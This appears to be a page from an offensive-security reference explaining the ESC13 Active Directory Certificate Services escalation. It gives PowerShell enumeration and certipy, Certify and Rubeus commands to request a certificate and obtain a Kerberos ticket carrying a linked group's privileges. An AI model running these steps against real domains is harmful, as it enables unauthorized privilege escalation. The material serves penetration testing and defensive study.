ad-adcs-esc13.md (3432B)
1 --- 2 title: "Active Directory - Certificate ESC13" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc13.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc13.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC13 12 13 ## ESC13 - Issuance Policy 14 15 > If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link. 16 17 **Requirements** 18 19 * The principal has enrollment rights on a certificate template 20 * The certificate template has an issuance policy extension 21 * The issuance policy has an OID group link to a group 22 * The certificate template defines EKUs that enable client authentication 23 24 ```ps1 25 PS C:\> $ESC13Template = Get-ADObject "CN=ESC13Template,$TemplateContainer" -Properties nTSecurityDescriptor $ESC13Template.nTSecurityDescriptor.Access | ? {$_.IdentityReference -eq "DUMPSTER\ESC13User"} 26 AccessControlType : Allow 27 28 # check if there is an issuance policy in the msPKI-Certificate-Policy 29 PS C:\> Get-ADObject "CN=ESC13Template,$TemplateContainer" -Properties msPKI-Certificate-Policy 30 msPKI-Certificate-Policy : {1.3.6.1.4.1.311.21.8.4571196.1884641.3293620.10686285.12068043.134.3651508.12319448} 31 32 # check for OID group link 33 PS C:\> Get-ADObject "CN=12319448.2C2B96A74878E00434BEDD82A61861C5,$OIDContainer" -Properties DisplayName,msPKI-Cert-Template-OID,msDS-OIDToGroupLink 34 msDS-OIDToGroupLink : CN=ESC13Group,OU=Groups,OU=Tier0,DC=dumpster,DC=fire 35 36 # verify if ESC13Group is a Universal group 37 PS C:\> Get-ADGroup ESC13Group -Properties Members 38 GroupScope : Universal 39 Members : {} 40 ``` 41 42 **Exploitation**: 43 44 * Find a vulnerable template 45 46 ```ps1 47 certipy find -target dc.lab.local -dc-ip 10.10.10.10 -u "username" -p "P@ssw0rd" -stdout -vulnerable 48 ``` 49 50 * Request a certificate for the vulnerable template 51 52 ```ps1 53 .\Certify.exe request /ca:DC01\dumpster-DC01-CA /template:ESC13Template 54 certipy req -target dc.lab.local -dc-ip 10.10.10.10 -u "username" -p "P@ssw0rd" -template <ESC13-Template> -ca <CA-NAME> 55 ``` 56 57 * Merge into a PFX file 58 59 ```ps1 60 certutil -MergePFX .\esc13.pem .\esc13.pfx 61 ``` 62 63 * Verify the presence of the "Client Authentication" and the "Policy Identifier" 64 65 ```ps1 66 certutil -Dump -v .\esc13.pfx 67 ``` 68 69 * Pass-The-Certificate: Ask a TGT for our user, but we are also member of the linked group and inherited their privileges 70 71 ```ps1 72 Rubeus.exe asktgt /user:ESC13User /certificate:C:\esc13.pfx /nowrap 73 Rubeus.exe asktgt /user:username /certificate:username.pfx /domain:lab.local /dc:dc /nowrap 74 ``` 75 76 * Pass-The-Ticket: Use the ticket that grant privileges from the AD group 77 78 ```ps1 79 Rubeus.exe ptt /ticket:<ticket> 80 ``` 81 82 ## References 83 84 * [ADCS ESC13 Abuse Technique - Jonas Bülow Knudsen - 02/15/2024](https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53) 85 * [Exploitation de l’AD CS : ESC12, ESC13 et ESC14 - Guillon Bony Rémi - February, 2025](https://connect.ed-diamond.com/misc/mischs-031/exploitation-de-l-ad-cs-esc12-esc13-et-esc14) 86 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)